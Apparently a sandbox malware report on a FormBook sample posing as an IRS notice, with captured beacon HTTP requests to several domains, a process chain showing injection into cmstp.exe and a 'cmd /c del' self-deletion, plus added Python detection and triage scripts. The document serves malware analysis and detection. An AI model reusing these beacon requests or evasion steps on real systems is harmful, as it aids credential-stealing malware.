                                                                          Data Ascii: <!DOCTYPE html><html lang="en"> <head> <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" integrity="sha384-JcKb8q3iqJ61gNV9KGb8thSsNjpSL0n8PARn9HuZOnIxN0hoP+VmmDGMN5t9UJ0Z" crossorigin="anonymous"> <link rel="stylesheet" type="text/css" href="./css/main.css"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>The Buzz Traders</title></head> <body id="emailListBody" class="text-center"> <div id="emailListContainer" class="col-12 text-center"> <img src="./img/TheBuzzTraders.png" height="230px" width="230px"> <h1 class="text-center" id="slogan">INVEST IN YOUR TOMORROW</h1> <h5 class="text-center" id="pageDescrip">Sign up for our newsletter</h5> <div id="formDiv" class="text-center"> <form method="POST" action="insert"> <label for="email" class="col-12" id="emailLabel">Email:</label> <input type="email" required id="email" name="email">


                                                                          Session ID: 9
                                                                          Source IP: 192.168.2.4
                                                                          Source Port: 49740
                                                                          Destination IP: 34.102.136.180
                                                                          Destination Port: 80
                                                                          Process: C:\Windows\explorer.exe
                                                                          Timestamp: Jan 11, 2021 16:25:36.761926889 CET
                                                                          kBytes transferred: 385
                                                                          Direction: OUT
                                                                          Data: GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1
                                                                          Host: www.emuprising.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Timestamp: Jan 11, 2021 16:25:36.900512934 CET
                                                                          kBytes transferred: 385
                                                                          Direction: IN
                                                                          Data: HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Mon, 11 Jan 2021 15:25:36 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "5fd4972f-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
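
The sessions above share one shape: explorer.exe sends GET /09rb/?Jt78=<changing blob>&pN9=EXX8_N6xKpqxS to unrelated domains a few seconds apart (www.thebuzztraders.com, www.emuprising.com, and the host that answered with the 301 pointing at www.aizimov.com), and each server returns whatever the contacted site normally serves, a newsletter page here, a 403 there. The same path, the same parameter names, one value that never changes and one that changes every request is the key a detection engineer would cluster on. The script below is an added example, not part of the sandbox report and not Joe Sandbox or any vendor's tooling: it parses captured request lines and reports the groups that match that shape across several hosts. The two malicious request lines are copied from sessions 8 and 9; the two benign requests, the `HttpRequest` and `BeaconCluster` types and the `find_beacon_clusters` helper are constructed for the example.

```python
"""Cluster HTTP requests that reuse one URI template across unrelated hosts.

Added example (not part of the sandbox report). Heuristic: a process that sends
the same path with the same parameter names to several hosts, where one
parameter value never changes (a fixed token) and another changes on every
request (a per-request payload), is behaving like a beacon, not a browser.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class HttpRequest:
    timestamp: str
    process: str
    host: str
    request_line: str  # "METHOD /path?query HTTP/1.1" as captured


# Constructed sample input: the first two entries copy the outbound request
# lines from sessions 8 and 9 of the report; the last two are made-up benign traffic.
SAMPLE_REQUESTS = [
    HttpRequest("2021-01-11 16:25:25 CET", r"C:\Windows\explorer.exe", "www.thebuzztraders.com",
                "GET /09rb/?Jt78=tK5SHJ/B9VkSEfSQE3soaE4uMhY2LrE6ZvvxVQcBFq9KYH6DfuOZHLVl1n1LVl7A3A7r&pN9=EXX8_N6xKpqxS HTTP/1.1"),
    HttpRequest("2021-01-11 16:25:36 CET", r"C:\Windows\explorer.exe", "www.emuprising.com",
                "GET /09rb/?Jt78=boggCF0+VtvWGkPjuCU1AaxF3fKHqCWZ16CI7xOuJOi/WrjAR/MJUlDlafE5AdeUJQBT&pN9=EXX8_N6xKpqxS HTTP/1.1"),
    HttpRequest("2021-01-11 16:25:40 CET", r"C:\Windows\explorer.exe", "example.com",
                "GET /index.html HTTP/1.1"),
    HttpRequest("2021-01-11 16:25:41 CET", r"C:\Program Files\Browser\browser.exe", "search.example.net",
                "GET /search?q=irs+notice&page=1 HTTP/1.1"),
]


@dataclass
class BeaconCluster:
    process: str
    path: str
    hosts: tuple[str, ...]
    constant_params: dict[str, str]   # name -> value identical on every host
    varying_params: tuple[str, ...]   # names whose value differs per request


def parse_request_line(line: str) -> tuple[str, str, dict[str, str]]:
    """Split 'GET /p?a=1&b=2 HTTP/1.1' into (method, path, {'a': '1', 'b': '2'}).

    Values are kept raw on purpose: '+' and '/' inside the Jt78 blob are part of
    the token, not form encoding, so urllib's parse_qsl would mangle them.
    """
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    params: dict[str, str] = {}
    for piece in parts.query.split("&") if parts.query else []:
        name, _, value = piece.partition("=")
        params[name] = value
    return method, parts.path, params


def find_beacon_clusters(requests: list[HttpRequest], min_hosts: int = 2) -> list[BeaconCluster]:
    """Group by (process, path, parameter names); keep groups that reach at least
    min_hosts distinct hosts with a fixed-token-plus-varying-payload shape."""
    groups: dict[tuple[str, str, tuple[str, ...]], list[tuple[str, dict[str, str]]]] = defaultdict(list)
    for req in requests:
        _method, path, params = parse_request_line(req.request_line)
        if not params:
            continue  # nothing to correlate on
        groups[(req.process, path, tuple(sorted(params)))].append((req.host, params))

    clusters: list[BeaconCluster] = []
    for (process, path, names), entries in groups.items():
        hosts = tuple(sorted({host for host, _ in entries}))
        if len(hosts) < min_hosts:
            continue
        constant: dict[str, str] = {}
        varying: list[str] = []
        for name in names:
            values = {params[name] for _, params in entries}
            if len(values) == 1:
                constant[name] = values.pop()
            else:
                varying.append(name)
        if constant and varying:  # fixed token next to a per-request payload
            clusters.append(BeaconCluster(process, path, hosts, constant, tuple(varying)))
    return clusters


if __name__ == "__main__":
    for c in find_beacon_clusters(SAMPLE_REQUESTS):
        print(f"{c.process}: {c.path} to {len(c.hosts)} hosts {c.hosts}; "
              f"fixed {c.constant_params}; varies {c.varying_params}")
```

Run over a proxy log or the sandbox's PCAP export, each cluster is a pivot: the fixed `pN9` value is the string to hunt for across other hosts, and the varying `Jt78` blob is the part to hand to a decoder. Which of the contacted domains, if any, is the real command-and-control server cannot be read from this page; the 200 and 403 above are the ordinary responses of the sites that were contacted.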


                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior


                                                                          System Behavior

                                                                          General

                                                                          Start time:16:22:46
                                                                          Start date:11/01/2021
                                                                          Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x400000
                                                                          File size:106496 bytes
                                                                          MD5 hash:3FC4D64F320D7FAE4BB46F6A735AB853
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:Visual Basic
                                                                          Reputation:low

                                                                          General

                                                                          Start time:16:23:05
                                                                          Start date:11/01/2021
                                                                          Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x400000
                                                                          File size:106496 bytes
                                                                          MD5 hash:3FC4D64F320D7FAE4BB46F6A735AB853
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.751064707.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:16:23:16
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:
                                                                          Imagebase:0x7ff6fee60000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:16:23:29
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\SysWOW64\cmstp.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                          Imagebase:0xca0000
                                                                          File size:82944 bytes
                                                                          MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.1022334778.0000000005467000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1021417062.00000000030C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000003.00000002.1021594863.000000000322D000.00000004.00000020.sdmp, Author: Florian Roth
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:16:23:33
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
                                                                          Imagebase:0x11d0000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:16:23:34
                                                                          Start date:11/01/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff724c50000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
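
The process list above records the chain a responder would reconstruct by hand: the sample starts once as a Visual Basic executable and once more under the same path, now classified as native code and carrying FormBook Yara hits in memory; explorer.exe appears with an empty command line; cmstp.exe is started from SysWOW64 with no .inf argument and also carries FormBook in memory; and cmd.exe deletes the original file. The following is an added example, not part of the report and not Joe Sandbox tooling: it parses these "General" blocks in the report's own layout and applies four triage rules to them. The excerpt is copied from the entries above (trimmed to the fields the rules use); the rule identifiers and the `ProcessRecord`, `parse_report` and `triage` helpers are constructed for the example. Parent/child relationships are not on this page, so the rules work only from the per-process fields shown.

```python
"""Triage the per-process 'General' blocks of a sandbox report.
Added example, not part of the report: parses the key:value blocks shown under
System Behavior and applies the checks a responder would otherwise make by hand."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed excerpt in the report's own layout; values are copied from the
# System Behavior section, with the Yara lines cut down to one rule each.
REPORT_EXCERPT = r"""
General
Start time:16:22:46
Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
Programmed in:Visual Basic
General
Start time:16:23:05
Path:C:\Users\user\Desktop\IRS Notice Letter pdf document.exe
Commandline:'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.754908908.000000001DFF0000.00000040.00000001.sdmp, Author: Joe Security
General
Start time:16:23:16
Path:C:\Windows\explorer.exe
Commandline:
General
Start time:16:23:29
Path:C:\Windows\SysWOW64\cmstp.exe
Commandline:C:\Windows\SysWOW64\cmstp.exe
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1021169489.0000000000D60000.00000004.00000001.sdmp, Author: Joe Security
General
Start time:16:23:33
Path:C:\Windows\SysWOW64\cmd.exe
Commandline:/c del 'C:\Users\user\Desktop\IRS Notice Letter pdf document.exe'
"""

FIELDS = {"start time": "start_time", "path": "path", "commandline": "commandline", "programmed in": "runtime"}
DEL_TARGET = re.compile(r"/c\s+del\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


@dataclass
class ProcessRecord:
    start_time: str = ""
    path: str = ""
    commandline: str = ""
    runtime: str = ""                 # the report's "Programmed in" field
    yara_rules: list[str] = field(default_factory=list)

    @property
    def image(self) -> str:
        return self.path.rsplit("\\", 1)[-1].lower()

    @property
    def in_windows_dir(self) -> bool:
        return self.path.lower().startswith("c:\\windows\\")


def parse_report(text: str) -> list[ProcessRecord]:
    """One ProcessRecord per 'General' block. Splits on the first colon only, so
    a 'Path:C:\\...' value keeps its drive letter."""
    records: list[ProcessRecord] = []
    for raw in text.strip().splitlines():
        line = raw.strip()
        if line == "General":
            records.append(ProcessRecord())
        elif line.startswith("• Rule:"):
            records[-1].yara_rules.append(line[len("• Rule:"):].split(",", 1)[0].strip())
        else:
            key, sep, value = line.partition(":")
            if sep and key.strip().lower() in FIELDS:
                setattr(records[-1], FIELDS[key.strip().lower()], value.strip())
    return records


def triage(records: list[ProcessRecord]) -> list[tuple[str, str]]:
    """Return (rule_id, image) pairs for the behaviours worth escalating."""
    findings: list[tuple[str, str]] = []
    sample_paths = {r.path for r in records if not r.in_windows_dir}
    by_path: dict[str, list[ProcessRecord]] = defaultdict(list)
    for r in records:
        by_path[r.path].append(r)
    # Same file started twice with different detected runtimes: the later
    # instance executes code that is not in the file on disk (hollowing).
    for group in by_path.values():
        if len(group) > 1 and len({g.runtime for g in group}) > 1:
            findings.append(("reexec_with_different_runtime", group[0].image))
    for r in records:
        # Malware Yara hits inside a Microsoft binary under C:\Windows: injection.
        if r.in_windows_dir and r.yara_rules:
            findings.append(("injected_system_process", r.image))
        # cmstp.exe normally takes an .inf profile; a bare launch is a host for injected code.
        if r.image == "cmstp.exe" and ".inf" not in r.commandline.lower():
            findings.append(("cmstp_without_inf", r.image))
        # cmd.exe /c del aimed at the sample itself: self-deletion after injection.
        m = DEL_TARGET.search(r.commandline) if r.image == "cmd.exe" else None
        if m and m.group(1) in sample_paths:
            findings.append(("sample_self_delete", r.image))
    return findings


if __name__ == "__main__":
    for rule_id, image in triage(parse_report(REPORT_EXCERPT)):
        print(f"{rule_id:32} {image}")
```

explorer.exe produces no finding here because the report shows no Yara hit in it on this page, even though it is the process that later emits the HTTP beacons; that gap is why the network clusters and the process triage should be read together rather than relying on either alone.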

                                                                          Disassembly

                                                                          Code Analysis
